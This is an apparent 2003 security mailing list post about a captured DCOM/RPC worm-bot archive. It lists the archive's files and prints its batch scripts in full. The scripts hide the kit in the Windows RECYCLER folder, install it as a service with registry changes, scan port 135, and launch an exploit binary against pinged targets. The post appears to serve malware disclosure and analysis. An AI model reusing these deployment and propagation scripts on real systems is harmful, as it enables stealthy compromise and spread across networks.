DCOM bot.rar

From: Andrej (lajat_private)
Date: Tue Aug 19 2003 - 02:21:39 PDT


    I was finally able to get bot.rar...
    Here is the archive list:
    Archive bot.rar 
    
    Name             Size   Packed Ratio  Date   Time     Attr      CRC   Meth Ver
    -------------------------------------------------------------------------------
    winole.exe     572928   566724  98% 22-07-03 18:47   .....A   6E1BA67C m3e 2.9
    wmpx.exe        43383    35139  80% 07-08-03 02:01   .....A   0A73E7CB m3e 2.9
    wx11.bat          109      109 100% 06-08-03 18:29   .....A   BA641709 m0e 2.9
    wx12.bat          194      166  85% 07-08-03 03:28   .....A   66A7E567 m3e 2.9
    wx12.exe        19618    10055  51% 06-08-03 20:55   .....A   273D03A0 m3e 2.9
    logs                0        0   0% 07-08-03 14:22   .D....   00000000 m0  2.0
    unrar.bat         169      137  81% 06-08-03 18:22   .....A   4E276E39 m3e 2.9
    UnRAR.exe      194048    87237  44% 16-06-03 18:32   ......   B638F78C m3e 2.9
    bnc.cfg            76       75  98% 27-07-03 16:48   .....A   03CDF0A3 m3e 2.9
    Clear.exe       28672    11962  41% 16-06-03 18:32   .....A   FBA086F4 m3e 2.9
    click.exe       32768     6149  18% 16-06-03 18:32   .....A   EA3874C5 m3e 2.9
    CRC.EXE         24096     8231  34% 16-06-03 21:41   .....A   D2158CA5 m3e 2.9
    cygwin1.dll    971080   375803  38% 17-06-03 03:06   .....A   7337F48A m3e 2.9
    deploy.bat        274      185  67% 06-08-03 18:20   .....A   A3DA5EC6 m3e 2.9
    dhcpp.exe       69632    28908  41% 16-06-03 18:32   .....A   2CA5E915 m3e 2.9
    drvx.dll         2853     1215  42% 06-08-03 21:03   .....A   5956B0F0 m3e 2.9
    events.exe     134656    37316  27% 22-07-03 17:58   .....A   0EF30C5D m3e 2.9
    jesus.dll        4254     1275  29% 07-08-03 01:21   .....A   BFF39F13 m3e 2.9
    LucomServer.dll      802      484  60% 06-08-03 18:00   .....A   4C649F72 m3e 2.9
    msoft.dll         206      128  62% 24-07-03 00:13   .....A   8DF17003 m3e 2.9
    nctl.exe       569344   542111  95% 26-07-03 21:12   .....A   F0C7F7AA m3e 2.9
    pslist.exe      49152    21746  44% 16-06-03 21:41   .....A   ED211211 m3e 2.9
    Q019204.EXE     21584    10136  46% 16-06-03 21:41   .....A   212BBC50 m3e 2.9
    reg.reg           773      432  55% 04-08-03 14:23   .....A   6FE50066 m3e 2.9
    service.exe     63488    26461  41% 01-07-03 10:40   .....A   78DBBEF8 m3e 2.9
    service.txt       176      129  73% 06-08-03 18:02   .....A   E63DBB36 m3e 2.9
    SFind.exe      266752   263546  98% 07-08-03 02:04   .....A   76BB24D4 m3e 2.9
    start.dll        6153     1745  28% 07-08-03 14:22   .....A   303AF0E8 m3e 2.9
    users.dll       75017    23205  30% 07-08-03 01:22   .....A   EE2F60B1 m3e 2.9
    -------------------------------------------------------------------------------
      29          3152257  2060809  65% 
    
    
    the .bat files are below:
    ::::::::::::::
    deploy.bat
    ::::::::::::::
    cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
    mkdir "logs"
    copy bot.rar c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
    net stop WinOLE
    service.exe -r WinOLE
    service.exe service.txt
    %SYSTEMROOT%\regedit.exe -S reg.reg
    net start WinOLE
    exit
    ::::::::::::::
    unrar.bat
    ::::::::::::::
    cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ 
    
    attrib -r bot.rar
    attrib -r unrar.exe
    attrib -r unrar.bat 
    
    unrar.exe x bot.rar
    start deploy.bat
    EXIT
    ::::::::::::::
    wx11.bat
    ::::::::::::::
    cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    ECHO. > RPC.dll
    sfind -p 135 %1 %2
    del RPC.dll
    ::::::::::::::
    wx12.bat
    ::::::::::::::
    cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    ECHO. > rpcf.dll
    ping -n 1 %2 | find "Reply"
    if errorlevel 1 goto end
    wx12.exe 1 %2 %1
    wx12.exe 0 %2 %1
    :end
    del rpcf.dll
    exit 
    
    
    


